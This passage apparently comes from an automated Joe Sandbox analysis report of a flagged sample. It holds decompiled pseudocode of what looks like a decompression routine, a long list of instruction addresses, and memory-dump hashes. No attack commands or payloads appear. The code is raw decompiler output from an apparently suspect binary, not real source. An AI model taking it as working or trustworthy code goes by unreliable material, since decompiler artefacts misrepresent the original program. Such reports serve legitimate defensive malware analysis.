													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L176:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L184:
												__edi = 0;
												goto L10;
											} else {
												L180:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L185:
													0 = 1;
													goto L10;
												}
												goto L181;
											}
									}
								}
								L182:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L183:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d89
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d8f
                                                                            0x00406d8f
                                                                            0x00406d92
                                                                            0x00406d95
                                                                            0x00406d9a
                                                                            0x00406d9c
                                                                            0x00406d9f
                                                                            0x00406da2
                                                                            0x00406da5
                                                                            0x00406da5
                                                                            0x00406da8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406daa
                                                                            0x00406daa
                                                                            0x00406dad
                                                                            0x00406db2
                                                                            0x00406db4
                                                                            0x00406db7
                                                                            0x00406dbd
                                                                            0x00406b1c
                                                                            0x00406b1c
                                                                            0x00406b1f
                                                                            0x00406b25
                                                                            0x00406b2b
                                                                            0x00406b34
                                                                            0x00406b3a
                                                                            0x00406b3d
                                                                            0x00406b44
                                                                            0x00406b49
                                                                            0x00406b4f
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406dc3
                                                                            0x00406dc3
                                                                            0x00406dcd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dd3
                                                                            0x00406dd3
                                                                            0x00406dd7
                                                                            0x00406dda
                                                                            0x00406dda
                                                                            0x00406dde
                                                                            0x00406de4
                                                                            0x00406de4
                                                                            0x00406de7
                                                                            0x00406dea
                                                                            0x00406df0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406df2
                                                                            0x00406e14
                                                                            0x00406e14
                                                                            0x00406e17
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dfe
                                                                            0x00406dfe
                                                                            0x00406e01
                                                                            0x00406e04
                                                                            0x00406e09
                                                                            0x00406e0b
                                                                            0x00406e0e
                                                                            0x00406e11
                                                                            0x00406e11
                                                                            0x00406e19
                                                                            0x00406e19
                                                                            0x00406e1f
                                                                            0x00406e22
                                                                            0x00406e25
                                                                            0x00406e25
                                                                            0x00406e2c
                                                                            0x00406e30
                                                                            0x00406e34
                                                                            0x00406e37
                                                                            0x00406e3a
                                                                            0x00406e40
                                                                            0x00406e45
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e47
                                                                            0x00406e5b
                                                                            0x00406e5b
                                                                            0x00406e5f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e49
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e53
                                                                            0x00406e58
                                                                            0x00406e58
                                                                            0x00406e58
                                                                            0x00406e61
                                                                            0x00406e61
                                                                            0x00406e64
                                                                            0x00406e72
                                                                            0x00406e78
                                                                            0x00406e7d
                                                                            0x00406e83
                                                                            0x00406e89
                                                                            0x00406e8f
                                                                            0x00406e96
                                                                            0x00406eaa
                                                                            0x00406eaa
                                                                            0x00407479
                                                                            0x00407479
                                                                            0x00407479
                                                                            0x0040747e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ab6
                                                                            0x00406ab6
                                                                            0x00000000
                                                                            0x004070b1
                                                                            0x004070b1
                                                                            0x004070b5
                                                                            0x004070b8
                                                                            0x004070bb
                                                                            0x004070be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070c4
                                                                            0x004070c4
                                                                            0x004070e9
                                                                            0x004070e9
                                                                            0x004070e9
                                                                            0x004070eb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070c9
                                                                            0x004070c9
                                                                            0x004070cd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070d3
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070d9
                                                                            0x004070dc
                                                                            0x004070de
                                                                            0x004070e0
                                                                            0x004070e3
                                                                            0x004070e6
                                                                            0x004070e6
                                                                            0x004070e6
                                                                            0x004070ed
                                                                            0x004070ed
                                                                            0x004070f5
                                                                            0x004070f8
                                                                            0x004070fb
                                                                            0x004070fe
                                                                            0x00407102
                                                                            0x00407105
                                                                            0x00407107
                                                                            0x0040710a
                                                                            0x0040710c
                                                                            0x00407120
                                                                            0x00407120
                                                                            0x00407123
                                                                            0x0040713d
                                                                            0x0040713d
                                                                            0x00407140
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407146
                                                                            0x00407146
                                                                            0x00407149
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040714f
                                                                            0x0040714f
                                                                            0x00000000
                                                                            0x0040714f
                                                                            0x00407125
                                                                            0x00407128
                                                                            0x0040712f
                                                                            0x00407132
                                                                            0x00000000
                                                                            0x00407132
                                                                            0x0040710e
                                                                            0x00407112
                                                                            0x00407115
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040715a
                                                                            0x0040715a
                                                                            0x0040717f
                                                                            0x0040717f
                                                                            0x0040717f
                                                                            0x00407181
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x0040715f
                                                                            0x00407163
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407169
                                                                            0x00407169
                                                                            0x0040716c
                                                                            0x0040716f
                                                                            0x00407172
                                                                            0x00407174
                                                                            0x00407176
                                                                            0x00407179
                                                                            0x0040717c
                                                                            0x0040717c
                                                                            0x0040717c
                                                                            0x00407183
                                                                            0x0040718b
                                                                            0x0040718e
                                                                            0x00407191
                                                                            0x00407193
                                                                            0x00407196
                                                                            0x00407196
                                                                            0x00407198
                                                                            0x0040719c
                                                                            0x0040719f
                                                                            0x004071a2
                                                                            0x004071a5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004071ab
                                                                            0x004071ab
                                                                            0x004071d0
                                                                            0x004071d0
                                                                            0x004071d0
                                                                            0x004071d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004071b0
                                                                            0x004071b0
                                                                            0x004071b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004071ba
                                                                            0x004071ba
                                                                            0x004071bd
                                                                            0x004071c0
                                                                            0x004071c3
                                                                            0x004071c5
                                                                            0x004071c7
                                                                            0x004071ca
                                                                            0x004071cd
                                                                            0x004071cd
                                                                            0x004071cd
                                                                            0x004071d4
                                                                            0x004071d4
                                                                            0x004071dc
                                                                            0x004071df
                                                                            0x004071e2
                                                                            0x004071e5
                                                                            0x004071e9
                                                                            0x004071ec
                                                                            0x004071ee
                                                                            0x004071f1
                                                                            0x004071f4
                                                                            0x0040720e
                                                                            0x0040720e
                                                                            0x00407211
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407217
                                                                            0x00407217
                                                                            0x0040721a
                                                                            0x00407221
                                                                            0x00000000
                                                                            0x00407221
                                                                            0x004071f6
                                                                            0x004071f9
                                                                            0x00407200
                                                                            0x00407203
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407229
                                                                            0x00407229
                                                                            0x0040724e
                                                                            0x0040724e
                                                                            0x0040724e
                                                                            0x00407250
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040722e
                                                                            0x0040722e
                                                                            0x00407232
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407238
                                                                            0x00407238
                                                                            0x0040723b
                                                                            0x0040723e
                                                                            0x00407241
                                                                            0x00407243
                                                                            0x00407245
                                                                            0x00407248
                                                                            0x0040724b
                                                                            0x0040724b
                                                                            0x0040724b
                                                                            0x00407252
                                                                            0x0040725a
                                                                            0x0040725d
                                                                            0x00407260
                                                                            0x00407262
                                                                            0x00407265
                                                                            0x00407265
                                                                            0x00407267
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040726d
                                                                            0x0040726d
                                                                            0x00407270
                                                                            0x00407275
                                                                            0x00407277
                                                                            0x0040727d
                                                                            0x0040727f
                                                                            0x00407294
                                                                            0x00407296
                                                                            0x00407296
                                                                            0x00407281
                                                                            0x00407287
                                                                            0x00407289
                                                                            0x0040728b
                                                                            0x0040728b
                                                                            0x00407298
                                                                            0x0040729c
                                                                            0x0040729f
                                                                            0x004072a5
                                                                            0x004072a5
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072aa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072b0
                                                                            0x004072b0
                                                                            0x004072b6
                                                                            0x004072b8
                                                                            0x004072dd
                                                                            0x004072e0
                                                                            0x004072e6
                                                                            0x004072eb
                                                                            0x004072f1
                                                                            0x004072f7
                                                                            0x004072f9
                                                                            0x004072fc
                                                                            0x00407305
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x004072fe
                                                                            0x00407300
                                                                            0x00407302
                                                                            0x00407302
                                                                            0x0040730d
                                                                            0x00407313
                                                                            0x00407315
                                                                            0x00407318
                                                                            0x0040731a
                                                                            0x00407320
                                                                            0x00407322
                                                                            0x00407324
                                                                            0x00407326
                                                                            0x00407328
                                                                            0x0040732b
                                                                            0x00407334
                                                                            0x00407337
                                                                            0x00407337
                                                                            0x0040732d
                                                                            0x0040732d
                                                                            0x00407330
                                                                            0x00407330
                                                                            0x0040732b
                                                                            0x00407322
                                                                            0x00407339
                                                                            0x0040733b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040733b
                                                                            0x004072ba
                                                                            0x004072ba
                                                                            0x004072c0
                                                                            0x004072c6
                                                                            0x004072c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072ca
                                                                            0x004072ca
                                                                            0x004072cc
                                                                            0x004072ce
                                                                            0x004072d7
                                                                            0x004072d7
                                                                            0x004072d0
                                                                            0x004072d0
                                                                            0x004072d3
                                                                            0x004072d3
                                                                            0x004072d9
                                                                            0x004072db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407341
                                                                            0x00407341
                                                                            0x00407346
                                                                            0x00407348
                                                                            0x00407349
                                                                            0x0040734a
                                                                            0x0040734b
                                                                            0x00407351
                                                                            0x00407354
                                                                            0x00407357
                                                                            0x0040735a
                                                                            0x0040735c
                                                                            0x00407362
                                                                            0x00407362
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x0040736e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407373
                                                                            0x00407373
                                                                            0x00407376
                                                                            0x00407379
                                                                            0x0040737b
                                                                            0x00407412
                                                                            0x00407412
                                                                            0x00407415
                                                                            0x00407417
                                                                            0x00407418
                                                                            0x00407419
                                                                            0x0040741c
                                                                            0x00000000
                                                                            0x0040741c
                                                                            0x00407381
                                                                            0x00407381
                                                                            0x00407387
                                                                            0x00407389
                                                                            0x004073ae
                                                                            0x004073b1
                                                                            0x004073b7
                                                                            0x004073bc
                                                                            0x004073c2
                                                                            0x004073c8
                                                                            0x004073ca
                                                                            0x004073cd
                                                                            0x004073d6
                                                                            0x004073dc
                                                                            0x004073dc
                                                                            0x004073cf
                                                                            0x004073d1
                                                                            0x004073d3
                                                                            0x004073d3
                                                                            0x004073de
                                                                            0x004073e4
                                                                            0x004073e6
                                                                            0x004073e9
                                                                            0x004073eb
                                                                            0x004073f1
                                                                            0x004073f3
                                                                            0x004073f5
                                                                            0x004073f7
                                                                            0x004073f9
                                                                            0x004073fc
                                                                            0x00407405
                                                                            0x00407408
                                                                            0x00407408
                                                                            0x004073fe
                                                                            0x004073fe
                                                                            0x00407401
                                                                            0x00407401
                                                                            0x004073fc
                                                                            0x004073f3
                                                                            0x0040740a
                                                                            0x0040740c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040740c
                                                                            0x0040738b
                                                                            0x0040738b
                                                                            0x00407391
                                                                            0x00407397
                                                                            0x00407399
                                                                            0x0040739a
                                                                            0x00000000
                                                                            0x00407424
                                                                            0x00407424
                                                                            0x00407427
                                                                            0x00407429
                                                                            0x0040742c
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406add
                                                                            0x00406ac1
                                                                            0x00000000
                                                                            0x00406ac7
                                                                            0x00406aca
                                                                            0x00406ad4
                                                                            0x00406ad7
                                                                            0x00406ada
                                                                            0x00000000
                                                                            0x00406ada
                                                                            0x00406ac1
                                                                            0x00406ae5
                                                                            0x00406ae8
                                                                            0x00406aec
                                                                            0x00406af6
                                                                            0x00406b00
                                                                            0x00406b03
                                                                            0x00406b09
                                                                            0x00406c3d
                                                                            0x00406c3f
                                                                            0x00406c45
                                                                            0x00406c48
                                                                            0x00406c4b
                                                                            0x00000000
                                                                            0x00406c4b
                                                                            0x00406b0f
                                                                            0x00406b0f
                                                                            0x00406b10
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6f
                                                                            0x00406c15
                                                                            0x00406c15
                                                                            0x00406c1a
                                                                            0x00406c1d
                                                                            0x00406c22
                                                                            0x00406c25
                                                                            0x00406c2a
                                                                            0x00406c2d
                                                                            0x00406c32
                                                                            0x00406c35
                                                                            0x00406c35
                                                                            0x00000000
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b79
                                                                            0x00406b7e
                                                                            0x00406b7e
                                                                            0x00406b7e
                                                                            0x00406b83
                                                                            0x00406b85
                                                                            0x00406b87
                                                                            0x00406b8c
                                                                            0x00406b92
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8c
                                                                            0x00406b9b
                                                                            0x00406b9e
                                                                            0x00406ba0
                                                                            0x00406ba3
                                                                            0x00406ba3
                                                                            0x00406bd7
                                                                            0x00406bdc
                                                                            0x00406bde
                                                                            0x00406bdf
                                                                            0x00406be1
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406c0a
                                                                            0x00406c0f
                                                                            0x00406c0f
                                                                            0x00000000
                                                                            0x00406c0f
                                                                            0x00406b6f
                                                                            0x00406b12
                                                                            0x00406b12
                                                                            0x00406b13
                                                                            0x00406b5d
                                                                            0x00000000
                                                                            0x00406b5d
                                                                            0x00406b15
                                                                            0x00406b16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c52
                                                                            0x00406c52
                                                                            0x00406c56
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c5c
                                                                            0x00406c5c
                                                                            0x00406c5f
                                                                            0x00406c62
                                                                            0x00406c67
                                                                            0x00406c69
                                                                            0x00406c6c
                                                                            0x00406c6f
                                                                            0x00406c6f
                                                                            0x00406c6f
                                                                            0x00406c77
                                                                            0x00406c77
                                                                            0x00406c7a
                                                                            0x00406c7c
                                                                            0x00406c81
                                                                            0x00406c84
                                                                            0x00406c86
                                                                            0x00406c89
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c8f
                                                                            0x00406c8f
                                                                            0x00406c91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c97
                                                                            0x00406c97
                                                                            0x00406c9b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ca1
                                                                            0x00406ca1
                                                                            0x00406ca4
                                                                            0x00406ca6
                                                                            0x00406d44
                                                                            0x00406d44
                                                                            0x00406d47
                                                                            0x00406d49
                                                                            0x00406d49
                                                                            0x00406d4c
                                                                            0x00406d4f
                                                                            0x00406d51
                                                                            0x00406d53
                                                                            0x00406d55
                                                                            0x00406d55
                                                                            0x00406d5e
                                                                            0x00406d63
                                                                            0x00406d66
                                                                            0x00406d69
                                                                            0x00406d6c
                                                                            0x00406d6f
                                                                            0x00406d6f
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d78
                                                                            0x00406d78
                                                                            0x00406d7e
                                                                            0x00406d7e
                                                                            0x00406d7e
                                                                            0x00000000
                                                                            0x00406d72
                                                                            0x00406cac
                                                                            0x00406cac
                                                                            0x00406cb2
                                                                            0x00406cb5
                                                                            0x00406cb7
                                                                            0x00406ce2
                                                                            0x00406ce5
                                                                            0x00406ceb
                                                                            0x00406cf0
                                                                            0x00406cf6
                                                                            0x00406cfc
                                                                            0x00406cfe
                                                                            0x00406d01
                                                                            0x00406d0a
                                                                            0x00406d10
                                                                            0x00406d10
                                                                            0x00406d03
                                                                            0x00406d05
                                                                            0x00406d07
                                                                            0x00406d07
                                                                            0x00406d12
                                                                            0x00406d18
                                                                            0x00406d1b
                                                                            0x00406d1d
                                                                            0x00406d1f
                                                                            0x00406d25
                                                                            0x00406d27
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d35
                                                                            0x00406d35
                                                                            0x00406d37
                                                                            0x00406d2e
                                                                            0x00406d2e
                                                                            0x00406d31
                                                                            0x00406d31
                                                                            0x00406d39
                                                                            0x00406d39
                                                                            0x00406d27
                                                                            0x00406d3c
                                                                            0x00406d3e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d3e
                                                                            0x00406cb9
                                                                            0x00406cb9
                                                                            0x00406cbf
                                                                            0x00406cc5
                                                                            0x00406cc7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406cc9
                                                                            0x00406cc9
                                                                            0x00406ccb
                                                                            0x00406ccd
                                                                            0x00406cd0
                                                                            0x00406cd7
                                                                            0x00406cd7
                                                                            0x00406cd9
                                                                            0x00406cd2
                                                                            0x00406cd2
                                                                            0x00406cd4
                                                                            0x00406cd4
                                                                            0x00406cdb
                                                                            0x00406cdd
                                                                            0x00406ce0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406de4
                                                                            0x00406de7
                                                                            0x00406dea
                                                                            0x00406df0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fc7
                                                                            0x00406fc7
                                                                            0x00406fc7
                                                                            0x00406fca
                                                                            0x00406fcd
                                                                            0x00406fcf
                                                                            0x00406fd2
                                                                            0x00406fd8
                                                                            0x00406fdf
                                                                            0x00406fe1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406eb5
                                                                            0x00406eb5
                                                                            0x00406edd
                                                                            0x00406edd
                                                                            0x00406edd
                                                                            0x00406edf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ebd
                                                                            0x00406ebd
                                                                            0x00406ec1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ec7
                                                                            0x00406ec7
                                                                            0x00406eca
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed2
                                                                            0x00406ed4
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406eda
                                                                            0x00406eda
                                                                            0x00406ee1
                                                                            0x00406ee1
                                                                            0x00406ee9
                                                                            0x00406eec
                                                                            0x00406ef2
                                                                            0x00406ef5
                                                                            0x00406ef9
                                                                            0x00406efd
                                                                            0x00406f00
                                                                            0x00406f03
                                                                            0x00406f1b
                                                                            0x00406f1b
                                                                            0x00406f1e
                                                                            0x00406f2c
                                                                            0x00406f2f
                                                                            0x00406f20
                                                                            0x00406f20
                                                                            0x00406f22
                                                                            0x00406f29
                                                                            0x00406f29
                                                                            0x00406f58
                                                                            0x00406f58
                                                                            0x00406f58
                                                                            0x00406f5b
                                                                            0x00406f5d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f38
                                                                            0x00406f38
                                                                            0x00406f3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f42
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4d
                                                                            0x00406f4f
                                                                            0x00406f52
                                                                            0x00406f55
                                                                            0x00406f55
                                                                            0x00406f55
                                                                            0x00406f5f
                                                                            0x00406f5f
                                                                            0x00406f61
                                                                            0x00406f63
                                                                            0x00406f6e
                                                                            0x00406f71
                                                                            0x00406f74
                                                                            0x00406f76
                                                                            0x00406f78
                                                                            0x00406f7a
                                                                            0x00406f7d
                                                                            0x00406f80
                                                                            0x00406f85
                                                                            0x00406f88
                                                                            0x00406f8b
                                                                            0x00406f8e
                                                                            0x00406f95
                                                                            0x00406f98
                                                                            0x00406f9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fa0
                                                                            0x00406fa0
                                                                            0x00406fa4
                                                                            0x00406fb5
                                                                            0x00406fb5
                                                                            0x00406fb5
                                                                            0x00406fb7
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fbd
                                                                            0x00406fbe
                                                                            0x00406fc1
                                                                            0x00406fc1
                                                                            0x00406fc1
                                                                            0x00406fc4
                                                                            0x00000000
                                                                            0x00406fc4
                                                                            0x00406fa6
                                                                            0x00406fa6
                                                                            0x00406fa9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406faf
                                                                            0x00406faf
                                                                            0x00000000
                                                                            0x00406faf
                                                                            0x00406f05
                                                                            0x00406f05
                                                                            0x00406f07
                                                                            0x00406f09
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f13
                                                                            0x00406f13
                                                                            0x00406fe7
                                                                            0x00406fe7
                                                                            0x00406fea
                                                                            0x00406ff1
                                                                            0x00406ff5
                                                                            0x00406ff7
                                                                            0x00406ffa
                                                                            0x00406ffd
                                                                            0x00407002
                                                                            0x00407005
                                                                            0x00407007
                                                                            0x00407008
                                                                            0x0040700b
                                                                            0x00407016
                                                                            0x00407019
                                                                            0x00407030
                                                                            0x00407035
                                                                            0x0040703c
                                                                            0x00407041
                                                                            0x00407045
                                                                            0x00407047
                                                                            0x00407047
                                                                            0x00407047
                                                                            0x0040704a
                                                                            0x0040704c
                                                                            0x00000000
                                                                            0x00407052
                                                                            0x00407052
                                                                            0x00407056
                                                                            0x00407061
                                                                            0x00407074
                                                                            0x00407079
                                                                            0x0040707e
                                                                            0x00407080
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407086
                                                                            0x00407086
                                                                            0x00407089
                                                                            0x0040708b
                                                                            0x00407099
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x00000000
                                                                            0x004070ae
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407093
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407093
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407432
                                                                            0x00407432
                                                                            0x00407438
                                                                            0x0040743e
                                                                            0x00407443
                                                                            0x00407449
                                                                            0x0040744f
                                                                            0x00407451
                                                                            0x00407454
                                                                            0x0040745d
                                                                            0x00407463
                                                                            0x00407463
                                                                            0x00407456
                                                                            0x00407458
                                                                            0x0040745a
                                                                            0x0040745a
                                                                            0x00407465
                                                                            0x00407467
                                                                            0x0040746a
                                                                            0x004074a5
                                                                            0x004074a5
                                                                            0x00000000
                                                                            0x0040746c
                                                                            0x0040746c
                                                                            0x0040746c
                                                                            0x00407472
                                                                            0x00407475
                                                                            0x00407477
                                                                            0x004074ac
                                                                            0x004074ae
                                                                            0x00000000
                                                                            0x004074ae
                                                                            0x00000000
                                                                            0x00407477
                                                                            0x00000000
                                                                            0x00406ab6
                                                                            0x00407484
                                                                            0x00000000
                                                                            0x00407484
                                                                            0x00406e98
                                                                            0x00406e9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e9c
                                                                            0x00406e9c
                                                                            0x00406e9f
                                                                            0x00000000
                                                                            0x00406e9f
                                                                            0x00406de4
                                                                            0x00406da5
                                                                            0x00407489
                                                                            0x0040748c
                                                                            0x0040748e
                                                                            0x00407497
                                                                            0x0040749d
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040755C Relevance: .3, Instructions: 300COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
